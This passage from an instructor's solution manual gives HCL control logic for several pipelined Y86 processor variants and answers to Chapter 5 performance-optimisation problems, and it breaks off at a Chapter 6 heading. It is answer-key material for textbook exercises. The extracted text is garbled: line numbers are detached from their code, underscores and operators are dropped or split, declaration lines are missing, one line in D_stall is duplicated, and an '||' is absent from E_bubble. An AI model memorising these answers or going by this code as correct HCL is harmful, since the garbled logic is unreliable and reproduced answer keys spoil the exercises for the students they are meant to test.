           D_icode in { IRRMOVL, IIRMOVL, IOPL} : D_rB;
           D_icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
175
           1 : RNONE; # Don't need register
176
177 ];
```

```
178
179 ## What register should be used as the M destination?
180 int new_E_dstM = [
181 D_icode in { IMRMOVL, IPOPL } : D_rA;
           1 : RNONE; # Don't need register
182
183 ];
184
185 ## What should be the A value?
186 ## Forward into decode stage for valA
187 int new_E_valA = [
          D_icode in { ICALL, IJXX } : D_valP; # Use incremented PC
188
           d srcA == E dstE : e valE; # Forward valE from execute
189
           d_srcA == M_dstM : m_valM;
                                      # Forward valM from memory
190
                                     # Forward valE from memory
          d_srcA == M_dstE : M_valE;
191
          d_srcA == W_dstM : W_valM;
                                     # Forward valM from write back
           d srcA == W dstE : W valE;
                                     # Forward valE from write back
193
           1 : d rvalA; # Use value read from register file
195 ];
196
197 int new_E_valB = [
           d_srcB == E_dstE : e_valE;
                                        # Forward valE from execute
           d_srcB == M_dstM : m_valM;  # Forward valM from memory
199
           d srcB == M dstE : M valE;
                                      # Forward valE from memory
200
           d_srcB == W_dstM : W_valM;
                                        # Forward valM from write back
201
           d_srcB == W_dstE : W_valE;
202
                                        # Forward valE from write back
           1 : d_rvalB; # Use value read from register file
203
204 ];
205
208 # BBTFNT: When some branches are predicted as not-taken, you need some
209 # way to get valC into pipeline register M, so that
210 # you can correct for a mispredicted branch.
211 # One way to do this is to run valC through the ALU, adding 0
212 # so that valC will end up in M_valE
214 ## Select input A to ALU
215 int aluA = [
           E_icode in { IRRMOVL, IOPL } : E_valA;
216
           # BBTFNT: Use ALU to pass E_valC to M_valE
217
218
           E_icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX } : E_valC;
           E_icode in { ICALL, IPUSHL } : -4;
219
           E_icode in { IRET, IPOPL } : 4;
220
           # Other instructions don't need ALU
221
222 ];
224 ## Select input B to ALU
225 int aluB = [
           E_icode in { IRMMOVL, IMRMOVL, IOPL, ICALL,
226
                         IPUSHL, IRET, IPOPL } : E_valB;
227
```

```
# BBTFNT: Add 0 to valC
228
          E icode in { IRRMOVL, IJXX } : 0;
          # Other instructions don't need ALU
230
231 ];
232
233 ## Set the ALU function
234 int alufun = [
         E_icode == IOPL : E_ifun;
          1 : ALUADD;
236
237 ];
238
239 ## Should the condition codes be updated?
240 bool set_cc = E_icode == IOPL;
241
242
245 ## Select memory address
246 int mem_addr = [
247 M_icode in { IRMMOVL, IPUSHL, ICALL, IMRMOVL } : M_valE;
          M_icode in { IPOPL, IRET } : M_valA;
          # Other instructions don't need address
249
250 ];
251
252 ## Set read control signal
253 bool mem_read = M_icode in { IMRMOVL, IPOPL, IRET };
254
255 ## Set write control signal
256 bool mem_write = M_icode in { IRMMOVL, IPUSHL, ICALL };
257
258
261 # Should I stall or inject a bubble into Pipeline Register F?
262 # At most one of these can be true.
263 bool F_bubble = 0;
264 bool F_stall =
          # Conditions for a load/use hazard
          E_icode in { IMRMOVL, IPOPL } &&
266
           E_dstM in { d_srcA, d_srcB } | |
267
268
          # Stalling at fetch while ret passes through pipeline
269
          IRET in { D_icode, E_icode, M_icode };
270
271 # Should I stall or inject a bubble into Pipeline Register D?
272 # At most one of these can be true.
273 bool D stall =
274
          # Conditions for a load/use hazard
275
          E_icode in { IMRMOVL, IPOPL } &&
          E_dstM in { d_srcA, d_srcB };
276
277
```

\_\_ code/arch/pipe-btfnt-ans.hcl

```
278 bool D_bubble =
           # Mispredicted branch
279
           # BBTFNT: Changed misprediction condition
280
281
           (E_icode == IJXX && E_ifun != JUNCOND &&
              (E_valC < E_valA && !e_Bch || E_valC >= E_valA && e_Bch)) ||
282
           # Stalling at fetch while ret passes through pipeline
283
            # but not condition for a load/use hazard
284
           !(E_icode in { IMRMOVL, IPOPL } && E_dstM in { d_srcA, d_srcB }) &&
285
              IRET in { D_icode, E_icode, M_icode };
286
287
288 # Should I stall or inject a bubble into Pipeline Register E?
289 # At most one of these can be true.
290 bool E_stall = 0;
291 bool E_bubble =
292
           # Mispredicted branch
            # BBTFNT: Changed misprediction condition
293
            (E icode == IJXX && E ifun != JUNCOND &&
294
              (E_valC < E_valA && !e_Bch || E_valC >= E_valA && e_Bch)) ||
295
           # Conditions for a load/use hazard
           E_icode in { IMRMOVL, IPOPL } &&
297
              E_dstM in { d_srcA, d_srcB};
299
300 # Should I stall or inject a bubble into Pipeline Register M?
301 # At most one of these can be true.
302 bool M stall = 0;
303 bool M_bubble = 0;
```

# **Problem 4.41 Solution:**

This is an interesting problem. It gives students the experience of improving the pipeline performance. It might be interesting to have them test the program on code that copies an array from one part of memory to another, comparing the CPE with and without load bypassing.

When testing the code with the scripts in ptest, be sure to do the performance checks. See the instructions in the README file for this directory.

A. Here's the formula for a load/use hazard:

```
E_icode ∈ {IMRMOVL, IPOPL} && (E_dstM = d_srcB | | E_dstM = d_srcA && ! D_icode ∈ {IRMMOVL, IPUSHL})
```

B. The HCL code for the control logic is shown below:

\_\_\_\_\_ code/arch/pipe-lf-ans.hcl

```
2 #
     HCL Description of Control for Pipelined Y86 Processor
     Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2002
6 ## This is the solution to the load-forwarding problem
9 # C Include's. Don't alter these
11
12 quote '#include <stdio.h>'
13 quote '#include "isa.h"'
14 quote '#include "pipeline.h"'
15 quote '#include "stages.h"'
16 quote '#include "sim.h"'
17 quote 'int sim_main(int argc, char *argv[]);'
18 quote 'int main(int argc, char *argv[]){return sim_main(argc,argv);}'
19
Declarations. Do not change/remove/delete any of these #
23
24 ##### Symbolic representation of Y86 Instruction Codes ##############
            'I_NOP'
25 intsig INOP
26 intsig IHALT
             'I_HALT'
27 intsig IRRMOVL 'I_RRMOVL'
28 intsig IIRMOVL 'I_IRMOVL'
29 intsig IRMMOVL 'I RMMOVL'
30 intsig IMRMOVL 'I MRMOVL'
31 intsig IOPL
             'I ALU'
32 intsig IJXX
             'I JMP'
33 intsig ICALL
            'I CALL'
34 intsig IRET
             'I RET'
35 intsig IPUSHL 'I PUSHL'
36 intsig IPOPL 'I_POPL'
37
38 ##### Symbolic representation of Y86 Registers referenced explicitly #####
39 intsig RESP 'REG_ESP' # Stack Pointer
40 intsig RNONE 'REG_NONE'
                        # Special value indicating "no register"
43 intsig ALUADD 'A_ADD'
                       # ALU should add its arguments
44
45 ##### Signals that can be referenced by control logic ###############
49 intsig F_predPC 'pc_curr->pc'  # Predicted value of PC
51 ##### Intermediate Values in Fetch Stage ############################
```

```
53 intsig f_icode 'if_id_next->icode' # Fetched instruction code
54 intsig f_ifun 'if_id_next->ifun' # Fetched instruction function
55 intsig f_valC 'if_id_next->valc' # Constant data of fetched instruction
56 intsig f_valP 'if_id_next->valp' # Address of following instruction
59 intsig D_icode 'if_id_curr->icode' # Instruction code
60 intsig D_rA 'if_id_curr->ra'  # rA field from instruction
61 intsig D_rB 'if_id_curr->rb'  # rB field from instruction
62 intsig D_valP 'if_id_curr->valp' # Incremented PC
66 intsig d_srcA 'id_ex_next->srca'  # srcA from decoded instruction
67 intsig d_srcB 'id_ex_next->srcb'  # srcB from decoded instruction
68 intsig d_rvalA 'd_regvala'  # valA read from register file
69 intsig d_rvalB 'd_regvalb'
                                # valB read from register file
83 intsig e_valE 'ex_mem_next->vale' # valE generated by ALU
84 boolsig e_Bch 'ex_mem_next->takebranch' # Am I about to branch?
86 ##### Pipeline Register M
                                   #####
89 intsig M_valA 'ex_mem_curr->vala'
                                # Source A value
90 intsig M_dstE 'ex_mem_curr->deste'
                                # Destination E register ID
91 intsig M_valE 'ex_mem_curr->vale'  # ALU E value
92 intsig M_dstM 'ex_mem_curr->destm'  # Destination M register ID
93 boolsig M_Bch 'ex_mem_curr->takebranch' # Branch Taken flag
94 ## LF: Carry srcA up to pipeline register M
96
98 intsig m_valM 'mem_wb_next->valm' # valM generated by memory
99
101 intsig W_icode 'mem_wb_curr->icode' # Instruction code
```

```
102 intsig W_dstE 'mem_wb_curr->deste'
                                    # Destination E register ID
103 intsig W valE
               'mem wb curr->vale'
                                     # ALU E value
104 intsig W_dstM 'mem_wb_curr->destm'
                                     # Destination M register ID
105 intsig W_valM 'mem_wb_curr->valm'
                                     # Memory M value
Control Signal Definitions.
110
111 ########### Fetch Stage
                               112
113 ## What address should instruction be fetched at
114 int f_pc = [
          # Mispredicted branch. Fetch at incremented PC
115
116
          M_icode == IJXX && !M_Bch : M_valA;
          # Completion of RET instruction.
117
         W icode == IRET : W valM;
          # Default: Use predicted value of PC
119
          1 : F_predPC;
120
121 ];
123 # Does fetched instruction require a regid byte?
124 bool need regids =
          f_icode in { IRRMOVL, IOPL, IPUSHL, IPOPL,
125
126
                     IIRMOVL, IRMMOVL, IMRMOVL };
127
128 # Does fetched instruction require a constant word?
129 bool need valC =
          f icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX, ICALL };
130
132 bool instr_valid = f_icode in
          { INOP, IHALT, IRRMOVL, IRRMOVL, IRMMOVL, IMRMOVL,
133
                IOPL, IJXX, ICALL, IRET, IPUSHL, IPOPL };
134
136 # Predict next value of PC
137 int new_F_predPC = [
          f_icode in { IJXX, ICALL } : f_valC;
138
          1 : f_valP;
139
140 ];
141
144
146 ## What register should be used as the A source?
147 int new E srcA = [
          D_icode in { IRRMOVL, IRMMOVL, IOPL, IPUSHL } : D_rA;
         D_icode in { IPOPL, IRET } : RESP;
149
          1 : RNONE; # Don't need register
150
151 ];
```

```
152
153 ## What register should be used as the B source?
154 int new_E_srcB = [
            D_icode in { IOPL, IRMMOVL, IMRMOVL } : D_rB;
            D_icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
156
             1 : RNONE; # Don't need register
157
158 ];
159
160 ## What register should be used as the E destination?
161 int new_E_dstE = [
            D_icode in { IRRMOVL, IIRMOVL, IOPL} : D_rB;
            D icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
163
             1 : RNONE; # Don't need register
164
165 l;
166
167 ## What register should be used as the M destination?
168 int new E dstM = [
169 D_icode in { IMRMOVL, IPOPL } : D_rA;
         1 : RNONE; # Don't need register
171 ];
172
173 ## What should be the A value?
174 ## Forward into decode stage for valA
175 int new_E_valA = [
             D_icode in { ICALL, IJXX } : D_valP; # Use incremented PC
176
           d_srcA == E_dstE : e_valE;  # Forward valE from execute
d_srcA == M_dstM : m_valM;  # Forward valM from memory
d_srcA == M_dstE : M_valE;  # Forward valE from memory
d_srcA == W_dstM : W_valM;  # Forward valM from write back
d_srcA == W_dstE : W_valE;  # Forward valE from write back
177
178
179
180
181
182
             1 : d_rvalA; # Use value read from register file
183 ];
184
185 int new E valB = [
            d_srcB == E_dstE : e_valE;  # Forward valE from execute
d_srcB == M_dstM : m_valM;  # Forward valM from memory
d_srcB == M_dstE : M_valE;  # Forward valE from memory
188
                                             # Forward valM from write back
            d_srcB == W_dstM : W_valM;
             d_srcB == W_dstE : W_valE; # Forward valE from write back
190
             1 : d_rvalB; # Use value read from register file
191
192 ];
193
196 ## Select input A to ALU
197 int aluA = [
             E_icode in { IRRMOVL, IOPL } : E_valA;
            E_icode in { IIRMOVL, IRMMOVL, IMRMOVL } : E_valC;
199
            E_icode in { ICALL, IPUSHL } : -4;
200
           E_icode in { IRET, IPOPL } : 4;
201
```

```
# Other instructions don't need ALU
202
203 ];
204
205 ## Select input B to ALU
206 int aluB = [
          E_icode in { IRMMOVL, IMRMOVL, IOPL, ICALL,
207
                       IPUSHL, IRET, IPOPL } : E_valB;
208
          E_icode in { IRRMOVL, IIRMOVL } : 0;
209
210
          # Other instructions don't need ALU
211 ];
212
213 ## Set the ALU function
214 int alufun = [
          E_icode == IOPL : E_ifun;
215
216
          1 : ALUADD;
217 ];
218
219 ## Should the condition codes be updated?
220 bool set_cc = E_icode == IOPL;
221
222
223 ## Generate M_valA
224 ## LB: With load forwarding, want to insert valM
      from memory stage when appropriate
226 int new_M_valA = [
227
          # Forwarding Condition
          M_dstM == E_srcA && E_icode in { IPUSHL, IRMMOVL } : m_valM;
228
          # Use valA
229
230
          1 : E valA;
231 ];
232
235 ## Select memory address
236 int mem_addr = [
237 M_icode in { IRMMOVL, IPUSHL, ICALL, IMRMOVL } : M_vale;
          M_icode in { IPOPL, IRET } : M_valA;
238
          # Other instructions don't need address
239
240 ];
241
242 ## Set read control signal
243 bool mem_read = M_icode in { IMRMOVL, IPOPL, IRET };
244
245 ## Set write control signal
246 bool mem_write = M_icode in { IRMMOVL, IPUSHL, ICALL };
247
248
251 # Should I stall or inject a bubble into Pipeline Register F?
```

```
252 # At most one of these can be true.
253 bool F bubble = 0;
254 bool F_stall =
255
            # Conditions for a load/use hazard
           E_icode in { IMRMOVL, IPOPL } &&
256
             (E_dstM == d_srcB ||
257
              (E_dstM == d_srcA && !D_icode in { IRMMOVL, IPUSHL })) ||
258
            # Stalling at fetch while ret passes through pipeline
259
260
           IRET in { D_icode, E_icode, M_icode };
261
262 # Should I stall or inject a bubble into Pipeline Register D?
263 # At most one of these can be true.
264 bool D_stall =
265
            # Conditions for a load/use hazard
266
           E_icode in { IMRMOVL, IPOPL } &&
           E icode in { IMRMOVL, IPOPL } &&
267
             (E dstM == d srcB |
              (E_dstM == d_srcA && !D_icode in { IRMMOVL, IPUSHL }));
269
270
271 bool D_bubble =
            # Mispredicted branch
272
            (E_icode == IJXX && !e_Bch) ||
273
            # Stalling at fetch while ret passes through pipeline
274
            # but not condition for a load/use hazard
275
276
            !(E_icode in { IMRMOVL, IPOPL } && E_dstM in { d_srcA, d_srcB }) &&
              IRET in { D_icode, E_icode, M_icode };
277
278
279 # Should I stall or inject a bubble into Pipeline Register E?
280 # At most one of these can be true.
281 bool E stall = 0;
282 bool E bubble =
283
            # Mispredicted branch
            (E_icode == IJXX && !e_Bch) ||
284
            # Conditions for a load/use hazard
           E_icode in { IMRMOVL, IPOPL } &&
286
287
             (E_dstM == d_srcB | |
              (E_dstM == d_srcA && !D_icode in { IRMMOVL, IPUSHL }));
288
290 # Should I stall or inject a bubble into Pipeline Register M?
291 # At most one of these can be true.
292 bool M_stall = 0;
293 bool M_bubble = 0;
```

\_\_\_\_\_ code/arch/pipe-lf-ans.hcl

# **Problem 4.42 Solution:**

This is a hard problem. It requires carefully thinking through the design and taking care of many details. It's fun to see the working pipeline in operation, though. It also gives some insight into how more complex instructions are implemented in a pipelined system. For example, Intel's implementation of the i486

processor uses a pipeline where some instructions require multiple cycles in the decode cycle to handle the complex address computations. Controlling this requires a mechanism similar to what we present here.

The complete HCL is shown below:

42 intsig IPOP2 'I\_POP2'

```
_____ code/arch/pipe-1w-ans.hcl
HCL Description of Control for Pipelined Y86 Processor
     Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2002
6 ## This is a solution to the single write port problem
7 ## Overall strategy: IPOPL passes through pipe,
8 ## treated as stack pointer increment, but not incrementing the PC
9 ## On refetch, modify fetched icode to indicate an instruction "IPOP2",
10 ## which reads from memory.
11
C Include's. Don't alter these
16 quote '#include <stdio.h>'
17 quote '#include "isa.h"'
18 quote '#include "pipeline.h"'
19 quote '#include "stages.h"'
20 quote '#include "sim.h"'
21 quote 'int sim_main(int argc, char *argv[]);'
22 quote 'int main(int argc, char *argv[]){return sim_main(argc,argv);}'
23
Declarations. Do not change/remove/delete any of these
28 ##### Symbolic representation of Y86 Instruction Codes ##############
29 intsig INOP
              'I NOP'
30 intsig IHALT
              'I HALT'
31 intsig IRRMOVL 'I_RRMOVL'
32 intsig IIRMOVL 'I IRMOVL'
33 intsig IRMMOVL 'I RMMOVL'
34 intsig IMRMOVL 'I_MRMOVL'
35 intsig IOPL
              'I ALU'
36 intsig IJXX
              'I_JMP'
37 intsig ICALL
              'I_CALL'
38 intsig IRET
              'I_RET'
39 intsig IPUSHL
              'I PUSHL'
40 intsig IPOPL
              'I_POPL'
41 # 1W: Special instruction code for second try of popl
```

44 ##### Symbolic representation of Y86 Registers referenced explicitly #####

```
45 intsig RESP
               'REG ESP'
                            # Stack Pointer
               'REG_NONE'
46 intsig RNONE
                            # Special value indicating "no register"
49 intsig ALUADD 'A_ADD'
                            # ALU should add its arguments
50
51 ##### Signals that can be referenced by control logic ###############
55 intsig F_predPC 'pc_curr->pc'
                                  # Predicted value of PC
58
59 intsig f_icode 'if_id_next->icode' # Fetched instruction code
60 intsig f ifun 'if id next->ifun' # Fetched instruction function
61 intsig f_valC 'if_id_next->valc' # Constant data of fetched instruction
62 intsig f_valP 'if_id_next->valp' # Address of following instruction
63 ## 1W: Provide access to the PC value for the current instruction
64 intsig f_pc 'f_pc'
                                 # Address of fetched instruction
67 intsig D_icode 'if_id_curr->icode'  # Instruction code
68 intsig D_rA 'if_id_curr->ra'  # rA field from instruction
69 intsig D_rB 'if_id_curr->rb'  # rB field from instruction
70 intsig D_valP 'if_id_curr->valp'
                                # Incremented PC
73
74 intsig d_srcA 'id_ex_next->srca'
                                  # srcA from decoded instruction
                                  # srcB from decoded instruction
75 intsig d srcB
               'id_ex_next->srcb'
                                 # valA read from register file
76 intsig d_rvalA 'd_regvala'
77 intsig d_rvalB 'd_regvalb'
                                    # valB read from register file
# Instruction function
                                 # Constant data
82 intsig E_valC 'id_ex_curr->valc'
83 intsig E_srcA 'id_ex_curr->srca'
                                   # Source A register ID
# Source A register ID

84 intsig E_valA 'id_ex_curr->vala'  # Source A value

85 intsig E_srcB 'id_ex_curr->srcb'  # Source B register ID

86 intsig E_valB 'id_ex_curr->valb'  # Source B value

87 intsig E_dstE 'id_ex_curr->deste'  # Destination E register ID

88 intsig E_dstM 'id_ex_curr->destm'  # Destination M register ID
89
91 intsig e_valE 'ex_mem_next->vale' # valE generated by ALU
92 boolsig e_Bch 'ex_mem_next->takebranch' # Am I about to branch?
94 ##### Pipeline Register M
                                      #####
```

```
# Instruction code
95 intsig M_icode 'ex_mem_curr->icode'
96 intsig M_ifun 'ex_mem_curr->ifun'
                                    # Instruction function
97 intsig M_valA 'ex_mem_curr->vala'
                                    # Source A value
98 intsig M_dstE 'ex_mem_curr->deste'
                                   # Destination E register ID
99 intsig M_valE
              'ex_mem_curr->vale'
                                    # ALU E value
100 intsig M_dstM 'ex_mem_curr->destm'
                                    # Destination M register ID
101 boolsig M_Bch 'ex_mem_curr->takebranch' # Branch Taken flag
102
104 intsig m_valM 'mem_wb_next->valm'
                                    # valM generated by memory
105
107 intsig W_icode 'mem_wb_curr->icode'
                                    # Instruction code
108 intsig W_dstE 'mem_wb_curr->deste'
                                    # Destination E register ID
109 intsig W_valE 'mem_wb_curr->vale'
                                   # ALU E value
110 intsig W_dstM 'mem_wb_curr->destm'
                                    # Destination M register ID
111 intsig W_valM 'mem_wb_curr->valm'
                                     # Memory M value
112
Control Signal Definitions.
116
117 ############ Fetch Stage
                              118
119 ## What address should instruction be fetched at
120 int f_pc = [
         # Mispredicted branch. Fetch at incremented PC
121
         M icode == IJXX && !M Bch : M valA;
122
         # Completion of RET instruction.
123
124
         W_icode == IRET : W_valM;
125
         # Default: Use predicted value of PC
126
         1 : F_predPC;
127 ];
129 # Does fetched instruction require a regid byte?
130 bool need_regids =
         f_icode in { IRRMOVL, IOPL, IPUSHL, IPOPL,
131
132
                    IPOP2,
                    IIRMOVL, IRMMOVL, IMRMOVL };
133
135 # Does fetched instruction require a constant word?
136 bool need_valC =
         f_icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX, ICALL };
137
139 bool instr valid = f icode in
         { INOP, IHALT, IRRMOVL, IIRMOVL, IRMMOVL, IMRMOVL,
140
               IOPL, IJXX, ICALL, IRET, IPUSHL, IPOPL, IPOP2 };
141
142
143 # Predict next value of PC
144 int new_F_predPC = [
```

```
f_icode in { IJXX, ICALL } : f_valC;
           # First time through popl. Refetch popl
146
           f_icode == IPOPL && D_icode != IPOPL: f_pc;
147
148
           1 : f_valP;
149 ];
150
151 ## W1: To split ipopl into two cycles, need to be able to
152 ## modify fetched value of icode, so that it will be IPOP2
153 ## when fetched for second time.
154 # Set code for fetched instruction
155 int new D icode = [
           ## Can detected refetch of ipopl, since now have
           ## IPOPL as icode for instruction in decode.
157
158
           f_icode == IPOPL && D_icode == IPOPL : IPOP2;
159
           1 : f_icode;
160 ];
161
164 ## W1: Strategy. Decoding of popl rA should be treated the same
165 ## as would iaddl $4, %esp
166 ## Decoding of pop2 rA treated same as mrmovl -4(%esp), rA
168 ## What register should be used as the A source?
169 int new_E_srcA = [
          D_icode in { IRRMOVL, IRMMOVL, IOPL, IPUSHL } : D_rA;
           D_icode in { IPOPL, IRET } : RESP;
171
           1 : RNONE; # Don't need register
172
173 ];
174
175 ## What register should be used as the B source?
176 int new_E_srcB = [
          D_icode in { IOPL, IRMMOVL, IMRMOVL } : D_rB;
           D icode in { IPUSHL, IPOPL, ICALL, IRET, IPOP2 } : RESP;
178
           1 : RNONE; # Don't need register
179
180 ];
181
182 ## What register should be used as the E destination?
183 int new_E_dstE = [
           D_icode in { IRRMOVL, IIRMOVL, IOPL} : D_rB;
184
           D_icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
185
           1 : RNONE; # Don't need register
186
187 ];
189 ## What register should be used as the M destination?
190 int new E dstM = [
191 D_icode in { IMRMOVL, IPOP2 } : D_rA;
192
          1 : RNONE; # Don't need register
193 ];
194
```

```
195 ## What should be the A value?
196 ## Forward into decode stage for valA
197 int new_E_valA = [
                                      # Forward valE from execute
# Forward valM from
           D_icode in { ICALL, IJXX } : D_valP; # Use incremented PC
           d_srcA == E_dstE : e_valE;
199
           d_srcA == M_dstM : m_valM;
200
           d_srcA == M_dstE : M_valE;
                                      # Forward valE from memory
201
                                      # Forward valM from write back
202
           d_srcA == W_dstM : W_valM;
                                      # Forward valE from write back
203
           d_srcA == W_dstE : W_valE;
           1 : d_rvalA; # Use value read from register file
204
205 ];
206
207 int new_E_valB = [
                                      # Forward valE from execute
           d_srcB == E_dstE : e_valE;
208
209
           d_srcB == M_dstM : m_valM;
                                      # Forward valM from memory
           d srcB == M dstE : M valE;
                                      # Forward valE from memory
210
           d srcB == W dstM : W valM;
                                        # Forward valM from write back
           d_srcB == W_dstE : W_valE;
212
                                        # Forward valE from write back
           1 : d_rvalB; # Use value read from register file
214 ];
218 ## Select input A to ALU
219 int aluA = [
           E_icode in { IRRMOVL, IOPL } : E_valA;
220
           E_icode in { IIRMOVL, IRMMOVL, IMRMOVL } : E_valC;
221
           E icode in { ICALL, IPUSHL, IPOP2 } : -4;
222
           E_icode in { IRET, IPOPL } : 4;
224
           # Other instructions don't need ALU
225 ];
226
227 ## Select input B to ALU
228 int aluB = [
           E_icode in { IRMMOVL, IMRMOVL, IOPL, ICALL,
229
230
                         IPUSHL, IRET, IPOPL, IPOP2 } : E_valB;
           E_icode in { IRRMOVL, IIRMOVL } : 0;
231
           # Other instructions don't need ALU
233 ];
235 ## Set the ALU function
236 int alufun = [
           E_icode == IOPL : E_ifun;
237
           1 : ALUADD;
238
239 ];
241 ## Should the condition codes be updated?
242 bool set_cc = E_icode == IOPL;
243
244
```

```
247 ## Select memory address
248 int mem_addr = [
249 M_icode in { IRMMOVL, IPUSHL, ICALL, IMRMOVL, IPOP2 } : M_valE;
          M_icode in { IRET } : M_valA;
          # Other instructions don't need address
251
252 ];
253
254 ## Set read control signal
255 bool mem_read = M_icode in { IMRMOVL, IPOP2, IRET };
257 ## Set write control signal
258 bool mem_write = M_icode in { IRMMOVL, IPUSHL, ICALL };
262 ## 1W: For this problem, we introduce a multiplexor that merges
263 ## valE and valM into a single value for writing to register port E.
264 ## DO NOT CHANGE THIS LOGIC
265 ## Merge both write back sources onto register port E
266 int w_dstE = [
267
          ## writing from valM
          W_dstM != RNONE : W_dstM;
268
269
          1: W_dstE;
270 ];
271 int w_valE = [
          W dstM != RNONE : W valM;
272
          1: W valE;
273
274 ];
275 ## Set so that register port M is never used.
276 int w_dstM = RNONE;
277 int w valM = 0;
281 # Should I stall or inject a bubble into Pipeline Register F?
282 # At most one of these can be true.
283 bool F_bubble = 0;
284 bool F_stall =
285
          # Conditions for a load/use hazard
286
          E_icode in { IMRMOVL, IPOP2 } &&
          E_dstM in { d_srcA, d_srcB } | |
287
          # Stalling at fetch while ret passes through pipeline
288
          IRET in { D_icode, E_icode, M_icode };
289
291 # Should I stall or inject a bubble into Pipeline Register D?
292 # At most one of these can be true.
293 bool D stall =
          # Conditions for a load/use hazard
294
```

code/arch/pipe-1w-ans.hcl

```
E_icode in { IMRMOVL, IPOP2 } &&
295
            E_dstM in { d_srcA, d_srcB };
296
297
298 bool D_bubble =
            # Mispredicted branch
299
            (E_icode == IJXX && !e_Bch) ||
300
            # Stalling at fetch while ret passes through pipeline
301
            # but not condition for a load/use hazard
302
            !(E_icode in { IMRMOVL, IPOPL } && E_dstM in { d_srcA, d_srcB }) &&
303
             IRET in { D_icode, E_icode, M_icode };
304
305
306 # Should I stall or inject a bubble into Pipeline Register E?
307 # At most one of these can be true.
308 bool E_stall = 0;
309 bool E_bubble =
            # Mispredicted branch
310
311
            (E icode == IJXX && !e Bch)
            # Conditions for a load/use hazard
312
           E_icode in { IMRMOVL, IPOP2 } &&
               E_dstM in { d_srcA, d_srcB};
314
316 # Should I stall or inject a bubble into Pipeline Register M?
317 # At most one of these can be true.
318 bool M_stall = 0;
319 bool M_bubble = 0;
```

# 1.5 Chapter 5: Optimizing Program Performance

### **Problem 5.11 Solution:**

This problem gives students a chance to examine machine code and perform a detailed analysis of its execution timing.

A. The translation to operations is similar to that for combine4, except that register %eax gets updated twice.

```
Execution unit operations

load (%esi, %edx.0, 4) \rightarrow %eax.1a

load (%ebx, %edx.0, 4) \rightarrow t.1

imull t.1,%eax.1a \rightarrow %eax.1b

addl %eax.1b,%ecx.0 \rightarrow %ecx.1

incl %edx.0 \rightarrow %edx.1

cmpl %esi, %edx.1 \rightarrow cc.1

jl-taken cc.1
```

- B. The multiplications performed by this routine are of the general form udata[i]\*vdata[i]. These are logically independent of each other. Hence the multiplier can execute them in a pipelined fashion.
- C. Our loop contains 5 integer and branch instructions, with only two functional units to execute them.
- D. The latency of the floating-point adder limits the CPE to at best 3.

# **Problem 5.12 Solution:**

This problem gives practice applying loop unrolling.

```
1 void inner5(vec_ptr u, vec_ptr v, data_t *dest)
2 {
      int i;
3
      int length = vec_length(u);
      int limit = length-3;
5
      data_t *udata = get_vec_start(u);
6
      data_t *vdata = get_vec_start(v);
8
      data_t sum = (data_t) 0;
9
      /* Do four elements at a time */
10
      for (i = 0; i < limit; i+=4) {
11
          sum += udata[i] * vdata[i]
12
               + udata[i+1] * vdata[i+1]
               + udata[i+2] * vdata[i+2]
14
               + udata[i+3] * vdata[i+3];
15
16
      }
17
      /* Finish off any remaining elements */
18
      for (; i < length; i++) {
19
           sum += udata[i] * vdata[i];
2.0
       *dest = sum;
22
23 }
```

- A. We must perform two loads per element to read values for udata and vdata. There is only one unit to perform these loads, and it requires one cycle.
- B. The performance for floating point is still limited by the 3 cycle latency of the floating-point adder.

## **Problem 5.13 Solution:**

This exercise gives students a chance to perform loop splitting.

```
1 void inner6(vec_ptr u, vec_ptr v, data_t *dest)
2 {
3    int i;
```

```
int length = vec_length(u);
4
5
      int limit = length-3;
      data_t *udata = get_vec_start(u);
6
      data_t *vdata = get_vec_start(v);
      data_t sum0 = (data_t) 0;
8
      data_t sum1 = (data_t) 0;
10
      /* Do four elements at a time */
11
      for (i = 0; i < limit; i+=4) {
12
           sum0 += udata[i] * vdata[i];
1.3
           sum1 += udata[i+1] * vdata[i+1];
14
           sum0 += udata[i+2] * vdata[i+2];
15
           sum1 += udata[i+3] * vdata[i+3];
16
17
18
      /* Finish off any remaining elements */
19
      for (; i < length; i++) {
20
          sum0 = sum0 + udata[i] * vdata[i];
21
22
      *dest = sum0 + sum1;
23
24 }
```

For each element, we must perform two loads with a unit that can only load one value per clock cycle. We must also perform one floating-point multiplication with a unit that can only perform one multiplication every two clock cycles. Both of these factors limit the CPE to 2.

## **Problem 5.14 Solution:**

This problem was originally developed for a midterm exam. Most students got correct answers for the first three parts, but fewer got the fourth part.

- A. It will return 0 whenever n is odd.
- B. Change loop test to i > 1.
- C. Performance is limited by the 4 cycle latency of integer multiplication.
- D. The multiplication z = i \* (i-1) can overlap with the multiplication result \* z from the previous iteration.

# **Problem 5.15 Solution:**

This problem is a simple exercise in using conditional move. Students could try assembling and testing their solutions.

```
1 movl 8(%ebp),%eax
2 movl 12(%ebp),%edx
3 cmpl %edx,%eax
4 cmovll %edx,%eax
Get x as result
Copy y to %edx
Compare x:y
If <, copy y to result</pre>
```

### **Problem 5.16 Solution:**

This problem encourages students to think about the general principles of using conditional moves.

It must be possible to evaluate expressions *then-expr* and *else-expr* without generating any errors or side effects.

# **Problem 5.17 Solution:**

This example illustrates a case where the generated code does not make good use of the load unit pipelining. We require ls->next to begin the next iteration, but we first fill the pipeline with a request for ls->data.



A.

B. Yes. For each iteration, the load unit first fetches the data value for the list element and then one cycle later begins fetching the address of the next list element. This latter load must complete before the next cycle can begin, limiting the CPE to 1 + 3 = 4.0.

## **Problem 5.18 Solution:**

Using some very strange looking source code, we were able to swap the order of the two loads in each loop to expedite the retrieval of ls->next. Perhaps a more advanced compiler could recognize the value of such a transformation.



A.

- B. Yes. Each iteration begins by fetching the address of the next list element. The fetch of the data begins one cycle later, but the next iteration can begin before this operation completes. Thus the performance is constrained by the load unit latency.
- C. This version makes better use of the load unit pipeline. It gives priority to the information that is required to begin the next iteration.

# **Problem 5.19 Solution:**

This problem is a simple application of Amdahl's law. Speeding up part B by 3 gives an overall speedup of 1/(.2+.3/3+.5) = 1.25. Speeding up part C by 1.5 gives an overall speedup of 1/(.2+.3+.5/1.5) = 1.2. So the best strategy is to optimize part B.

# **1.6** Chapter 6: The Memory Hierarchy

## **Problem 6.20 Solution:**

